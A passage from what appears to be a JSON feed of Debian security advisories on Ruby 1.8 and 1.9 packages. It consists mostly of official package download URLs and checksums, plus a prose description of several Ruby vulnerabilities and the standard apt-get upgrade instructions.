http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 1752738 3291630941e3dbb88efb8a97f33c208b\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 217116 6d9fbeeb9354b35e033f036109c3187c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 216638 513608a225ce87330453e9b1bd910f34\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 1001838 64e08e52fac509f2bcdec25fed6fdc07\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 719438 d568135366f021f1511e186201475268\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 197348 8fec8e658d39d42c2857475ef279f08d\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 290114 69d7bdf1893fe305a003fbcaf264c9e4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 1821730 a79338c8bfea54d6c6e78f85fb0aaa4d\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 1867788 9258d6168a057238d5dd1ead02513e74\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 758004 40c77b36b3a2b061db9c16b4a01f4391\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 237546 2e1c1a544086d57780f3ae4bb02da9c0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 345762 cb32b33017f36b17cc06cc8ed90414b9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 309632 3202e1f7f3c9eb0b6062148b9af7e788\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 215662 1cd102a588e1082716a0858dbc5891d0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 197442 c38974894410e79acf7931fc0e8dad54\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 330612 0887a43e2d62199cc73660039d7f1919\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 351174 1bb59b9997961359cb20c9fb6945a0f0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 351444 5918b0c479ee79cc7466484c76e6dd98\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 2225792 c780194abaeac68b844bc6fcd411376d\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 971834 e280240763deda9e120b41faf64b47e2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 203432 7430326aeac7519e33b7ca34a77c1779\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 220188 1b368e296ab170d1e005f600cada244f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 1864142 76176efd4132f6dd862946935368e2d6\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 218646 4c1088b7f7002d3223ca0a33e27eaa0e\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 1095818 64f6c9fd95b4c6af5cdfade1b958e9c8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 236376 d8ffa9e36d27c315bf12543035067d4b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 220668 62f25d6880a721afac92d5fbd08ee714\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 202476 a5d3f5c7b7c963ecd5ab916315deb460\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 1024524 c406606563dae3bf9ad255a4c0c8344f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 1895844 ea86b262fda8dc1dee04a1348abffbca\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 201506 22ba7b847e836fd960b0cb53358c106b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 220662 6f066d4dbe40ba488e1ae2e883dc6262\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 1861880 e3b9fcda55d44a6b921140fc49cdbecc\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 215262 4d2fe03f92af44b8362661b562b21754\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 1084552 2d2dac8ed50123fdb90d733e9cf9b855\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 1862110 3b49c520a4ce20c6d6fcc11319a182e1\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 1680280 bf7a624e97e372c4bbfc2fe769ff8974\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 197456 8c980f163be8105285609fdd454e1977\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 236198 81b996367fc453a8ceb3a531501253de\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 301628 bb1dc6aa3461335e4a9b419cd267ee65\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 874228 a5cc44dbd1cc80f8eef1a159ab3189f3\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 216100 f2360af30afc204b9226bf5cc0863853\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 197594 fca3406a3b55cfdc69c8989b072ca031\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 802420 6699c1bd4709051c910fc0bfe68c9b37\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 215980 2d9003c25275e1fd5ee6c53d959344f7\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 281536 fe8d5b309e7ab0be35e721e6b3ac97dd\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 217990 f096260bda09b34a2c2f8cf018c80ae1\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 1850962 60c4d783bcb2d0f852aa38fac3cad1d5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 196670 16d12b430464de86499d897c2a28b213\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 1540332 5b40f3e2137e7753b54b3202a02f2fa9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 372286 2a9d8fc201caad40ceefb3cbd2a61d12\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 218178 0298e98b39cbf08fa18d4fe0d617df41\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 215442 2c78e52c5e2a619a0d3b436c1a887a53\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 1538434 b88e43e5cec1aacf83a598dab477c3ab\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 1667992 01b49904e244952345158c4e22006a42\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 299462 1e7905d97c9ec5f2dffdd8dd22b48002\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 279298 5823c4a9baf7975c73eb6d36047dfed4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 1059442 dba878a9064478b59f1548cf661041f7\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 793388 f945925d054d92aba8ca6f7e46a685ee\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 216340 c676c1ea64ad2b41ee571249b99568d9\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 197742 9dfdbf8675ab4a56dfbfdeaa7bb6f733\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 216192 3ec8e74d7b723d246719dd9227862c8a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 367552 b0a7a4121cca96fc576497e5eeb7d664\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 858608 9f415ec47bba07a78331e26e35300a5b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 1837532 6face0d7dcc576c00e564c66d5e78d42\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 198096 80b334507f4cbfc62b2a439e5d6f3f2e\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 235700 826646ac1e00564ab805d15ac64659bd\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 197150 b5c725b9fe159d6b3ddb9a1d607d5516\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 1830428 4123d91e58c7e5f0c4a784d5087f929e\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 218314 45b937607b0c710f9651a88e3c77734a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 1808952 c905cd43d26918def2c2110b0d0787b8\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 1844840 4698433b87fa56b6f7c8cf581f9ad4c0\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 777146 a01b49460afc4733cff7d1da5c3892ca\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 219458 02100fb307634e08fd304f830fa73115\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 372960 2e69a084e4ecc663d54a885b69cd4d87\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 199768 14727fe59c8a774dc0ce5283bbe3adf4\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 218562 6ef5bfa416e85714847e7911ad15b7bc\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 294044 404be1b8ba5d7b1de693949bf7509c50\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 237306 abd5d03c1a8c5e730fbbb3b7cbfc13a3\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 217678 56fc7c04ec11e80b958592b53698f2cb\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 312482 489f3cd6e21ef98d9b3d4031313e0ff8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 199536 1a549205c85f26df75918ee1f5c5a5e6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 1107170 e3be222facad68b2ea2c1d743bfe7729\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 200076 a9030c3b873cf7feca45d7fb18b2c1c5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 1837356 f519218b7727c4c0064d87052a32cd57\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 719018 ff1d0ace8eeec5d602e0cc94c3b834ae\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 1592732 37cfd2a2da9ab0c297cd3e3e2d44d9b0\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 327762 27db76dd87740f49cf998c08d7ab567c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 1855938 622f315ff7c5c3e488b364102dff54bd\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 217518 c56bb0699f151595c7cea6cc0d002476\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 217572 74f4d455673a8cedbbd19f03cd1a68bf\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 779594 1da6fea9a757a6147bccd1be029efc77\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 884422 dd7a11cbdee41fc9efbfeb616236c261\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 1849714 09fcada1e82f4f89b7cff7bb556ac055\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 235540 3431f6c302e74a70f0e31b13ee703c19\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 1052398 95816bfd6638c6c6cf7c8c91f8a5a6df\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 305308 1123e31b1920e3e7f1ac216eddaaba37\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 1838936 4accc47fcb960eaa9b04a6ff450c678b\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 218044 d92f877014b653c14260db06cfa0844e\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 199000 3c6e11cc181a6593505e20279d310a03\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 198678 9b90584a77a43162a15087943f9596be\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 199480 65c1e5b6224a9a5ed5f1afe4053e9e97\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 218054 147f93ceaf0c8119ca264957ffc7c51a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 371520 61de55d36d7fadd6f885a4021bebc229\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 1620382 7a7339edea525e5d5bc6f8c794a8c3e7\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 197218 5ddc1259eef42b0c05439cb8ab731942\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 197994 3ab96c368edc3bce77e73b529c4c5b84\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 1833286 c7f9f992093cacfb766259e889de13ba\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 960816 c43630f6bbb40fb21fffdc0ad516ddfe\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 197944 2d534c9e73f36b3b75e01f2f20bfb6c6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 296102 c192762dbeaf435d11e51448565bc9b1\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 741330 59352ae48a97d10d96d23f84f8e3d4d7\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 1543188 313ab5a0048823ce919bf50a1b3f1de9\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 217960 208c79695f22f705f70ecce79efa87b4\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-01-02T21:47:38", "published": "2009-01-02T21:47:38", "id": "DEBIAN:DSA-1695-1:CB9A2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00001.html", "title": "[SECURITY] [DSA 1695-1] New Ruby packages fix denial of service", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:22:03", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1651-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nOctober 12, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : ruby1.8\nVulnerability : several\nProblem-Type : local(remote)\nDebian-specific: no\nCVE ID : CVE-2008-3655 CVE-2008-3656 CVE-2008-3657 CVE-2008-3790 CVE-2008-3905\n\nSeveral vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-3655\n\n Keita Yamaguchi discovered that several safe level restrictions\n are insufficiently enforced.\n \nCVE-2008-3656\n\n Christian Neukirchen discovered that the WebRick module uses\n inefficient algorithms for HTTP header splitting, resulting in\n denial of service through resource exhaustion.\n\nCVE-2008-3657\n\n It was discovered that the dl module doesn't perform taintness\n checks.\n\nCVE-2008-3790\n\n Luka Treiber and Mitja Kolsek discovered that recursively nested\n XML entities can lead to denial of service through resource\n exhaustion in rexml.\n\nCVE-2008-3905\n\n Tanaka Akira discovered that the resolv module uses sequential\n transaction IDs and a fixed source port for DNS queries, which\n makes it more vulnerable to DNS spoofing attacks.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.8.5-4etch3. Packages for arm will be provided later.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.8.7.72-1.\n\nWe recommend that you upgrade your ruby1.8 packages.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz\n Size/MD5 checksum: 4434227 aae9676332fcdd52f66c3d99b289878f\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3.dsc\n Size/MD5 checksum: 1079 4c7df61bd710db620b87ae0a3b98d388\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3.diff.gz\n Size/MD5 checksum: 142603 f7c9366a3e04f00f5d4e7deb5d27eaf9\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 1241006 d8312745f5bf656d950323c6c9761e1e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 211002 1b5eefc0ee08f8224b14e9cc887c408e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 245020 e16a6c9adf8603359b5031e46185bf25\n http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 235612 69142939deabd04310455bb13f288c66\n http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 310244 e321a815c462f98b404b8c1665d1b55f\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 903552 ad6a8ddd2bf50091f4379509c7b6cef4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 1869012 1a2090d92784326905495c96fe508bf2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 198226 b11408bce9fbb392955416fb76d3f6b8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 199160 e087c534968b3ee42d5c1a8eb271ffb0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 1638944 58b67c19df5d4394619792d1b8b40c03\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 199128 5ff5a9ca775487dcd3eb6d1e1d4eb180\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 219386 d12ee43d6a3f38b98852fedc2349d3d5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 1075242 ce403140ff57e22f5260226ff3d9325c\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 301056 98e0e061f488d2b111f032a19d5a1060\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 1068652 90b93dcde06d9ddcdee05ace2c42bb9e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 217282 f7c81dbf89b107a334ecd4bb4da66ba6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 198082 006299a09bf2074c481322dfbce9dfe6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 302902 6ef6a2d83f8b158b62ea62f3c4bba3fa\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 1586654 9d7b4530804e8089a08a95c39bdeabbe\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 748606 c07117a39289e01786fb9ee7a27a1829\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 1864338 a6e21b1b7dca462d5fb45689fe092150\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 197638 f6bb914b21492cf68cb1c4558e4ac644\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 198694 